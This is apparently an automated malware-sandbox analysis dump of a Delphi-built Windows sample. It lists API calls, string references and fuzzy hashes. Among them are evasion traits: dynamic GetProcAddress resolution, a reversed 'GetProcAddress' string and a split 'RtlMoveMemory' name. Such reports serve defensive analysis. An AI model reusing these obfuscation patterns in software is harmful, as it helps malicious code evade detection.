                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                        APIs
                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B3D225
                                          • Part of subcall function 02B3D1F0: GetProcAddress.KERNEL32(00000000), ref: 02B3D209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                        • API String ID: 1646373207-1918263038
                                        • Opcode ID: 5a7225b189f8d3776496245d50e9675b5d3d816efe0e75feaf1a3886f0c22b91
                                        • Instruction ID: 741bded0836188cef23070fbae832cb0609c76c46921ed394ac31b8975d0a3d1
                                        • Opcode Fuzzy Hash: 5a7225b189f8d3776496245d50e9675b5d3d816efe0e75feaf1a3886f0c22b91
                                        • Instruction Fuzzy Hash: 46417E63A946075B560BBBAD75005277BEED7887A036085DBF048DB381DE30BCA19E3D
                                        APIs
                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B46E66
                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B46E77
                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B46E87
                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B46E97
                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B46EA7
                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B46EB7
                                        • GetProcAddress.KERNEL32 ref: 02B46EC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                        • API String ID: 667068680-2233174745
                                        • Opcode ID: 53c2e16e614cdda274d01083d3f72a9cd75f15adb28e0c684e1abdf45cd9c734
                                        • Instruction ID: 7c3a595a01e2766a2605c03c2ece033b062055669d2d13a5ae24e2825c89fa75
                                        • Opcode Fuzzy Hash: 53c2e16e614cdda274d01083d3f72a9cd75f15adb28e0c684e1abdf45cd9c734
                                        • Instruction Fuzzy Hash: 3FF050E0AC97327EF7027F709CC19A7379D97126C43001BE576525A912DEB588505F58
                                        APIs
                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B328CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Message
                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                        • API String ID: 2030045667-32948583
                                        • Opcode ID: 666a3ed47fc132b20d3fd9378fba52a8403cb125c8d7663c8c71091e0ef6fcf4
                                        • Instruction ID: 79a5840c020d31b4231e5245db91dcae3b8aa0a6ad73facddd53346aa9f58134
                                        • Opcode Fuzzy Hash: 666a3ed47fc132b20d3fd9378fba52a8403cb125c8d7663c8c71091e0ef6fcf4
                                        • Instruction Fuzzy Hash: 29A1E331A042648BDF23AA2CCC80B99B7E5EF09750F1441E5ED49AB386CB759EC9CF51
                                        Strings
                                        • bytes: , xrefs: 02B3275D
                                        • The unexpected small block leaks are:, xrefs: 02B32707
                                        • , xrefs: 02B32814
                                        • Unexpected Memory Leak, xrefs: 02B328C0
                                        • An unexpected memory leak has occurred. , xrefs: 02B32690
                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B32849
                                        • 7, xrefs: 02B326A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                        • API String ID: 0-2723507874
                                        • Opcode ID: a469271652126a2d623fe34c796e608403d30ecba395c8b988a30fad6c5cc25c
                                        • Instruction ID: 27508cb8d7e4521f14544ab1e4fd4a185cecd26ff4fb674cc95bbb6f0e3b4c7c
                                        • Opcode Fuzzy Hash: a469271652126a2d623fe34c796e608403d30ecba395c8b988a30fad6c5cc25c
                                        • Instruction Fuzzy Hash: 9071B330A042A88FDF22AA2CCC84BD9BAE5FF09754F1041E5E949DB281DB759EC5CF51
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B4AE40
                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B4AE57
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 02B4AE6F
                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B4AEEB
                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B4AEF7
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B4AF0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Read$HandleLibraryLoadModule
                                        • String ID: KernelBase$LoadLibraryExA
                                        • API String ID: 2872661360-113032527
                                        • Opcode ID: 4f43887ce494a21add9b74384abb33aaa6b9ab63baf782930f285043f3ae6fe1
                                        • Instruction ID: 1f3b7059ce09abcce059b9fe8ab9e31b672de50080c3358ef8ca69274f44f4f7
                                        • Opcode Fuzzy Hash: 4f43887ce494a21add9b74384abb33aaa6b9ab63baf782930f285043f3ae6fe1
                                        • Instruction Fuzzy Hash: 443176B2A80305BBEB20DF58CCD5F9A77A8EF05754F104294FA54EB281DB70E940EB64
                                        APIs
                                        • GetThreadLocale.KERNEL32(00000000,02B3C013,?,?,00000000,00000000), ref: 02B3BD7E
                                          • Part of subcall function 02B3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B3A76A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Locale$InfoThread
                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                        • API String ID: 4232894706-2493093252
                                        • Opcode ID: 86c99f4eb6b682b4447447135b77ec0113dde66f35f534219f8bdffb72422d8d
                                        • Instruction ID: 6f670644a999030264e3303ce43725763d38e5c44a640f4f8d3c6247c8cdc2ca
                                        • Opcode Fuzzy Hash: 86c99f4eb6b682b4447447135b77ec0113dde66f35f534219f8bdffb72422d8d
                                        • Instruction Fuzzy Hash: DF612036B401489BDB02FBE4D8D0A9E7BBB9B49300F6098F5E101EB345DA35D9059B54
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B343F3,?,?,02B907C8,?,?,02B5D7A8,02B3655D,02B5C30D), ref: 02B34365
                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B343F3,?,?,02B907C8,?,?,02B5D7A8,02B3655D,02B5C30D), ref: 02B3436B
                                        • GetStdHandle.KERNEL32(000000F5,02B343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B343F3,?,?,02B907C8), ref: 02B34380
                                        • WriteFile.KERNEL32(00000000,000000F5,02B343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B343F3,?,?), ref: 02B34386
                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B343A4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FileHandleWrite$Message
                                        • String ID: Error$Runtime error at 00000000
                                        • API String ID: 1570097196-2970929446
                                        • Opcode ID: 393f27be11815c09e0d9996903987ebbec7a6a96cf463970fa4e65643476f47b
                                        • Instruction ID: e90be6a6e3bef96e276c2e56038ee614e101dbe4191bf253177a19a533beaafd
                                        • Opcode Fuzzy Hash: 393f27be11815c09e0d9996903987ebbec7a6a96cf463970fa4e65643476f47b
                                        • Instruction Fuzzy Hash: 53F0B471AD434179FB12BA64AC46F99376C8B45F64F148BD4B678AA0D0C7E0E0C4CB27
                                        APIs
                                          • Part of subcall function 02B3ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B3ACE1
                                          • Part of subcall function 02B3ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B3AD05
                                          • Part of subcall function 02B3ACC4: GetModuleFileNameA.KERNEL32(02B30000,?,00000105), ref: 02B3AD20
                                          • Part of subcall function 02B3ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B3ADB6
                                        • CharToOemA.USER32(?,?), ref: 02B3AE83
                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B3AEA0
                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B3AEA6
                                        • GetStdHandle.KERNEL32(000000F4,02B3AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B3AEBB
                                        • WriteFile.KERNEL32(00000000,000000F4,02B3AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B3AEC1
                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B3AEE3
                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B3AEF9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                        • String ID:
                                        • API String ID: 185507032-0
                                        • Opcode ID: 643b5c64b1d541831dcc171af6fd63d436a305cf074411f8d9b9f052c059182a
                                        • Instruction ID: e1abf99d3f06e584af3ff31f5516107620d17494df784f72805a48a289567875
                                        • Opcode Fuzzy Hash: 643b5c64b1d541831dcc171af6fd63d436a305cf074411f8d9b9f052c059182a
                                        • Instruction Fuzzy Hash: 791170B2584204BAD202FBA4CC80F9B77EDAB44740F900996B784D70D0DA70E944CF26
                                        APIs
                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B3E5AD
                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B3E5C9
                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B3E602
                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B3E67F
                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B3E698
                                        • VariantCopy.OLEAUT32(?,00000000), ref: 02B3E6CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                        • String ID:
                                        • API String ID: 351091851-0
                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                        • Instruction ID: b473f086076d61dddd55953e5b94e6d199e624cabbdbb99ef0e937013a7c3b30
                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                        • Instruction Fuzzy Hash: 3051C87690062E9BCB22EB58C890BD9B3BDAF4D300F4441D6E549E7252DB70EF858F61
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B3358A
                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B335BD
                                        • RegCloseKey.ADVAPI32(?,02B335E0,00000000,?,00000004,00000000,02B335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B335D3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                        • API String ID: 3677997916-4173385793
                                        • Opcode ID: bc3408ba63352a8a53d15d9d93ac6c1093f83248561e61738b11ea8648e8bcf8
                                        • Instruction ID: 6fb3e4a201064f1d342de433a11a2a180c8070edcd4edb5f997e528c90780b78
                                        • Opcode Fuzzy Hash: bc3408ba63352a8a53d15d9d93ac6c1093f83248561e61738b11ea8648e8bcf8
                                        • Instruction Fuzzy Hash: 8401D876954318BAF712DB94CD02BBE77ECEB08710F1005E1BA04D7580E6749610CB98
                                        APIs
                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                        • GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: Kernel32$sserddAcorPteG
                                        • API String ID: 667068680-1372893251
                                        • Opcode ID: e3b5327e77f65abe637f0a866c824ef1850bb2b538eb8240caa5015947f23ab2
                                        • Instruction ID: cc25984ccf0bb10061a85618eaee19f1332e9fc0e0b2c8e57fc72df013274c71
                                        • Opcode Fuzzy Hash: e3b5327e77f65abe637f0a866c824ef1850bb2b538eb8240caa5015947f23ab2
                                        • Instruction Fuzzy Hash: D5016235A54304BFEB02EFA8DC81E9E77BEEB4D750F5188E5F504E7650DA30A910EA24
                                        APIs
                                        • GetThreadLocale.KERNEL32(?,00000000,02B3AA6F,?,?,00000000), ref: 02B3A9F0
                                          • Part of subcall function 02B3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B3A76A
                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B3AA6F,?,?,00000000), ref: 02B3AA20
                                        • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02B3AA2B
                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B3AA6F,?,?,00000000), ref: 02B3AA49
                                        • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02B3AA54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Locale$InfoThread$CalendarEnum
                                        • String ID:
                                        • API String ID: 4102113445-0
                                        • Opcode ID: 6f1860d6f292f2c1307375a069e9140fa0808e84182ad6f36e64b750576debba
                                        • Instruction ID: 02971378a5a8a92e2e1bd146d37c828bf39264471dbf0d0acd1559c94e80b26e
                                        • Opcode Fuzzy Hash: 6f1860d6f292f2c1307375a069e9140fa0808e84182ad6f36e64b750576debba
                                        • Instruction Fuzzy Hash: 2B012B326402487FF703F7748D12B5E735DDB41720F7145E0F651E66D0DA249E008AA8
                                        APIs
                                        • GetThreadLocale.KERNEL32(?,00000000,02B3AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B3AAB7
                                          • Part of subcall function 02B3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B3A76A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Locale$InfoThread
                                        • String ID: eeee$ggg$yyyy
                                        • API String ID: 4232894706-1253427255
                                        • Opcode ID: e332ee4be0ffa2e03fedcf069d801e728827c4eda334ceb9e2dc4a2831b281c9
                                        • Instruction ID: fd17772f3750bcc9cb5c27928b7b3272f6d878f896c2b30d5e4783dd9a9fb5e5
                                        • Opcode Fuzzy Hash: e332ee4be0ffa2e03fedcf069d801e728827c4eda334ceb9e2dc4a2831b281c9
                                        • Instruction Fuzzy Hash: EA41D3757045058BD713AB698C902BEB3FBDB85200BB44AE5E4F2C7344EA38ED06CA21
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 02B47E5F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$MemoryMove
                                        • String ID: Ntdll$RtlM$oveM
                                        • API String ID: 2705147948-1610840992
                                        • Opcode ID: 83d55a31900d359b8ed989924d849827304e6cdc3a598fef82342778dca0a84d
                                        • Instruction ID: 93f2252d4272d36c792ef98a4e52810ab6f0a33db24813b297084b0c0b08199e
                                        • Opcode Fuzzy Hash: 83d55a31900d359b8ed989924d849827304e6cdc3a598fef82342778dca0a84d
                                        • Instruction Fuzzy Hash: 77017C35694204BFFB11EAA8DD82F6AB7BDE708B00F5149A0F505AB650DF70AD00BA24
                                        APIs
